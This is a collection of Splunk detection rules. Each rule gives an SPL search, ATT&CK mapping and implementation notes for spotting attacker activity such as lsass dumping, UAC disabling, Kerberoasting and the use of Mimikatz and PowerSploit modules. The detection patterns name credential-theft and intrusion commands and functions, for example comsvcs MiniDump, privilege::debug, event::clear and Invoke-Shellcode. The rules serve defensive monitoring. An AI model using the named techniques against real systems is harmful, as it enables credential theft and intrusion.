

Detection of tools built by nirsoft

This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1072
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="* /stext *" OR Processes.process="* /scomma *" ) by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `detection_of_tools_built_by_nirsoft_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1072 Software Deployment Tools Execution, Lateral Movement


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

While legitimate, these NirSoft tools are prone to abuse. You should verfiy that the tool was used for a legitimate purpose.

Reference

Test Dataset

version: 3


Disabling remote user account control

The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1548.002
  • Last Updated: 2020-11-18

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA* Registry.registry_value_name="DWORD (0x00000000)" by Registry.dest, Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_name Registry.action | `drop_dm_object_name(Registry)` | `disabling_remote_user_account_control_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report registry modifications.

Required field

ATT&CK

ID Technique Tactic
T1548.002 Bypass User Account Control Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

This registry key may be modified via administrators to implement a change in system policy. This type of change should be a very rare occurrence.

Reference

Test Dataset


version: 4


Dump lsass via comsvcs dll

Detect the usage of comsvcs.dll for dumping the lsass process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.001
  • Last Updated: 2020-02-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset


version: 1


Dump lsass via procdump

Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (OriginalFileName=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.001
  • Last Updated: 2021-02-01

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=procdump.exe (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset


version: 1


Dump lsass via procdump rename

Detect a renamed instance of procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2021-02-01

Search

`sysmon` OriginalFileName=procdump process_name!=procdump*.exe EventID=1 (CommandLine=*-ma* OR CommandLine=*-mm*) CommandLine=*lsass* | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, process_name, OriginalFileName, CommandLine | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_rename_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset


version: 1


Execution of file with multiple extensions

This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1036.003
  • Last Updated: 2020-11-18

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = *.doc.exe OR Processes.process = *.htm.exe OR Processes.process = *.html.exe OR Processes.process = *.txt.exe OR Processes.process = *.pdf.exe OR Processes.process = *.doc.exe by Processes.dest Processes.user Processes.process Processes.parent_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_multiple_extensions_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node.

Required field

ATT&CK

ID Technique Tactic
T1036.003 Rename System Utilities Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset


version: 3


File with samsam extension

The search looks for file writes with extensions consistent with a SamSam ransomware attack.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2018-12-14

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | search file_extension=.stubbin OR file_extension=.berkshire OR file_extension=.satoshi OR file_extension=.sophos OR file_extension=.keyxml | `file_with_samsam_extension_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

Kill Chain Phase

  • Installation


Known False Positives

Because these extensions are not typically used in normal operations, you should investigate all results.

Reference

Test Dataset


version: 1


First time seen child process of zoom

This search looks for child processes spawned by zoom.exe or zoom.us that has not previously been seen.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1068
  • Last Updated: 2020-05-20

Search

| tstats `security_content_summariesonly` min(_time) as firstTime values(Processes.parent_process_name) as parent_process_name values(Processes.parent_process_id) as parent_process_id values(Processes.process_name) as process_name values(Processes.process) as process from datamodel=Endpoint.Processes where (Processes.parent_process_name=zoom.exe OR Processes.parent_process_name=zoom.us) by Processes.process_id Processes.dest | `drop_dm_object_name(Processes)` | lookup zoom_first_time_child_process dest as dest process_name as process_name OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), "`previously_seen_zoom_child_processes_window`") | `security_content_ctime(firstTime)` | table firstTime dest, process_id, process_name, parent_process_id, parent_process_name |`first_time_seen_child_process_of_zoom_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You should run the baseline search `Previously Seen Zoom Child Processes - Initial` to build the initial table of child processes and hostnames for this search to work. You should also schedule at the same interval as this search the second baseline search `Previously Seen Zoom Child Processes - Update` to keep this table up to date and to age out old child processes. Please update the `previously_seen_zoom_child_processes_window` macro to adjust the time window.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

A new child process of zoom isn't malicious by that fact alone. Further investigation of the actions of the child process is needed to verify any malicious behavior is taken.

Reference

Test Dataset


version: 1


First time seen running windows service

This search looks for the first and last time a Windows service is seen running in your environment. This table is then cached.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1569.002
  • Last Updated: 2020-07-21

Search

`wineventlog_system` EventCode=7036 | rex field=Message "The (?<service>[-\(\)\s\w]+) service entered the (?<state>\w+) state" | where state="running" | lookup previously_seen_running_windows_services service as service OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), `previously_seen_windows_services_window`) | table _time dest service | `first_time_seen_running_windows_service_filter`

Associated Analytic Story


How To Implement

While this search does not require you to adhere to Splunk CIM, you must be ingesting your Windows system event logs in order for this search to execute successfully. You should run the baseline search `Previously Seen Running Windows Services - Initial` to build the initial table of child processes and hostnames for this search to work. You should also schedule at the same interval as this search the second baseline search `Previously Seen Running Windows Services - Update` to keep this table up to date and to age out old Windows Services. Please update the `previously_seen_windows_services_window` macro to adjust the time window. Please ensure that the Splunk Add-on for Microsoft Windows is version 8.0.0 or above.

Required field

ATT&CK

ID Technique Tactic
T1569.002 Service Execution Execution


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

A previously unseen service is not necessarily malicious. Verify that the service is legitimate and that was installed by a legitimate process.

Reference

Test Dataset

version: 4


First time seen command line argument

This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen. This is an implementation on SPL2 of the rule `First time seen command line argument` by @bpatel.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1059, [1], T1202
  • Last Updated: 2021-2-1

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), cmd_line=ucast(map_get(input_event, "process"), "string", null), cmd_line_norm=lower(cmd_line), cmd_line_norm=replace(cmd_line_norm, /[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}/, "GUID"), cmd_line_norm=replace(cmd_line_norm, /(?<=\s)+\\[^:]*(?=\\.*\.\w{3}(\s |$)+)/, "\\PATH"), /* replaces " \\Something\\Something\\command.ext" => "PATH\\command.ext" */ cmd_line_norm=replace(cmd_line_norm, /\w:\\[^:]*(?=\\.*\.\w{3}(\s |$)+)/, "\\PATH"), /* replaces "C:\\Something\\Something\\command.ext" => "PATH\\command.ext" */ cmd_line_norm=replace(cmd_line_norm, /\d+/, "N") | where process_name="cmd.exe" AND match_regex(ucast(cmd_line, "string", ""), /.* \/[cC] .*/)=true | select cmd_line, cmd_line_norm, timestamp, dest_device_id, dest_user_id | first_time_event input_columns=["cmd_line_norm"] | where first_time_cmd_line_norm | eval start_time = timestamp, end_time = timestamp, entities = mvappend(dest_device_id, dest_user_id), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be populating the endpoint data model for SSA and specifically the process_name and the process fields

Required field

  • process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1059 Command and Scripting Interpreter Execution
T1202 Indirect Command Execution Defense Evasion


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate programs can also use command-line arguments to execute. Please verify the command-line arguments to check what command/program is being executed. We recommend customizing the `first_time_seen_cmd_line_filter` macro to exclude legitimate parent_process_name

Reference

Test Dataset

version: 2


Hiding files and directories with attrib exe

Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1222.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=attrib.exe (Processes.process=*+h*) by Processes.parent_process Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `hiding_files_and_directories_with_attrib_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1222.001 Windows File and Directory Permissions Modification Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Some applications and users may legitimately use attrib.exe to interact with the files.

Reference

Test Dataset


version: 4


Illegal access to user content via powersploit modules

This detection identifies access to PowerSploit modules that enable illegaly access user content, such as key logging, audio recording, screenshots, tapping into http and RDP sessions, etc.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021, T1113, T1123, T1563
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-HttpStatus/)=true OR match_regex(cmd_line, /(?i)Get-Keystrokes/)=true OR match_regex(cmd_line, /(?i)Get-MicrophoneAudio/)=true OR match_regex(cmd_line, /(?i)Get-NetRDPSession/)=true OR match_regex(cmd_line, /(?i)Get-TimedScreenshot/)=true OR match_regex(cmd_line, /(?i)Get-WebConfig/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1021 Remote Services Lateral Movement
T1113 Screen Capture Collection
T1123 Audio Capture Collection
T1563 Remote Service Session Hijacking Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal account creation via powersploit modules

This detection identifies access to PowerSploit modules that create accounts illegaly.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1585
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)New-DomainUser/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1585 Establish Accounts Resource Development


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal deletion of logs via mimikatz modules

This detection identifies access to PowerSploit modules that delete event logs.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1070
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)event::drop/)=true OR match_regex(cmd_line, /(?i)event::clear/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1070 Indicator Removal on Host Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal enabling or disabling of accounts via dsinternals modules

This detection identifies use of DSInternals modules that enable or disable accounts illegaly.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1098
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Disable-ADDBAccount/)=true OR match_regex(cmd_line, /(?i)Enable-ADDBAccount/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal management of active directory elements and policies via dsinternals modules

This detection identifies use of DSInternals modules for illegal management of Active Directoty elements and policies.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1098, T1207, T1484
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Remove-ADDBObject/)=true OR match_regex(cmd_line, /(?i)Set-ADDBDomainController/)=true OR match_regex(cmd_line, /(?i)Set-ADDBPrimaryGroup/)=true OR match_regex(cmd_line, /(?i)Set-LsaPolicyInformation/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1098 Account Manipulation Persistence
T1207 Rogue Domain Controller Defense Evasion
T1484 Domain Policy Modification Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal management of computers and active directory elements via powersploit modules

This detection identifies access to PowerSploit modules that enable illegal management of computers and Active Directory elements.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1098, T1207, T1484
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Set-DomainObject/)=true OR match_regex(cmd_line, /(?i)Set-ADObject/)=true OR match_regex(cmd_line, /(?i)Set-DomainObjectOwner/)=true OR match_regex(cmd_line, /(?i)Set-MasterBootRecord/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1098 Account Manipulation Persistence
T1207 Rogue Domain Controller Defense Evasion
T1484 Domain Policy Modification Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal privilege elevation and persistence via powersploit modules

This detection identifies access to PowerSploit modules that illegaly elevate general privileges or ensure persistence, e.g., enable manipulation of registry, task scheduling, persistent WMI, access to OS objects under desired identities.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1053, T1134, T1548
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Add-DomainObjectAcl/)=true OR match_regex(cmd_line, /(?i)Add-ObjectAcl/)=true OR match_regex(cmd_line, /(?i)Enable-Privilege/)=true OR match_regex(cmd_line, /(?i)New-ElevatedPersistenceOption/)=true OR match_regex(cmd_line, /(?i)New-UserPersistenceOption/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1053 Scheduled Task/Job Execution, Persistence, Privilege Escalation
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal privilege elevation via mimikatz modules

This detection identifies use of Mimikatz modules for illegal privilege elevation.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1134, T1548
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)privilege::debug/)=true OR match_regex(cmd_line, /(?i)token::elevate/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal service and process control via mimikatz modules

This detection identifies use of Mimikatz modules for illegal control over services and processes, including the authentication service.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1055, T1106, T1569
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)process::start/)=true OR match_regex(cmd_line, /(?i)service::\+/)=true OR match_regex(cmd_line, /(?i)service::\-/)=true OR match_regex(cmd_line, /(?i)service::start/)=true OR match_regex(cmd_line, /(?i)service::stop/)=true OR match_regex(cmd_line, /(?i)service::suspend/)=true OR match_regex(cmd_line, /(?i)misc::memssp/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1106 Native API Execution
T1569 System Services Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal service and process control via powersploit modules

This detection identifies access to PowerSploit modules that enable illegal control of services and processes, such as installing or spoofing of malicious services, injecting malicious code in DLLs and EXEs, invoking shell code and WMI commands, modifying access to service objects, etc.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1055, T1106, T1569
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Install-SSP/)=true OR match_regex(cmd_line, /(?i)Set-CriticalProcess/)=true OR match_regex(cmd_line, /(?i)Install-ServiceBinary/)=true OR match_regex(cmd_line, /(?i)Restore-ServiceBinary/)=true OR match_regex(cmd_line, /(?i)Write-ServiceBinary/)=true OR match_regex(cmd_line, /(?i)Set-ServiceBinaryPath/)=true OR match_regex(cmd_line, /(?i)Invoke-ReflectivePEInjection/)=true OR match_regex(cmd_line, /(?i)Invoke-DllInjection/)=true OR match_regex(cmd_line, /(?i)Invoke-ServiceAbuse/)=true OR match_regex(cmd_line, /(?i)Invoke-Shellcode/)=true OR match_regex(cmd_line, /(?i)Invoke-WScriptUACBypass/)=true OR match_regex(cmd_line, /(?i)Invoke-WmiCommand/)=true OR match_regex(cmd_line, /(?i)Write-HijackDll/)=true OR match_regex(cmd_line, /(?i)Add-ServiceDacl/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1106 Native API Execution
T1569 System Services Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Kerberoasting spn request with rc4 encryption

This search detects a potential kerberoasting attack via service principal name requests

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1558.003
  • Last Updated: 2020-10-16

Search

`wineventlog_security` EventCode=4769 Ticket_Options=0x40810000 Ticket_Encryption_Type=0x17 | stats count min(_time) as firstTime max(_time) as lastTime by dest, service, service_id, Ticket_Encryption_Type, Ticket_Options | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `kerberoasting_spn_request_with_rc4_encryption_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, and include the windows security event logs that contain kerberos

Required field

ATT&CK

ID Technique Tactic
T1558.003 Kerberoasting Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Older systems that support kerberos RC4 by default NetApp may generate false positives

Reference


Test Dataset


version: 3


Macos - re-opened applications

This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2020-02-07

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*com.apple.loginwindow*" by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `macos___re_opened_applications_filter`

Associated Analytic Story

How To Implement

In order to properly run this search, Splunk needs to ingest process data from your osquery deployed agents with the [splunk.conf](https://github.com/splunk/TA-osquery/blob/master/config/splunk.conf) pack enabled. Also the [TA-OSquery](https://github.com/splunk/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the data populate the Endpoint data model.

Required field

Kill Chain Phase

  • Installation
  • Command and Control


Known False Positives

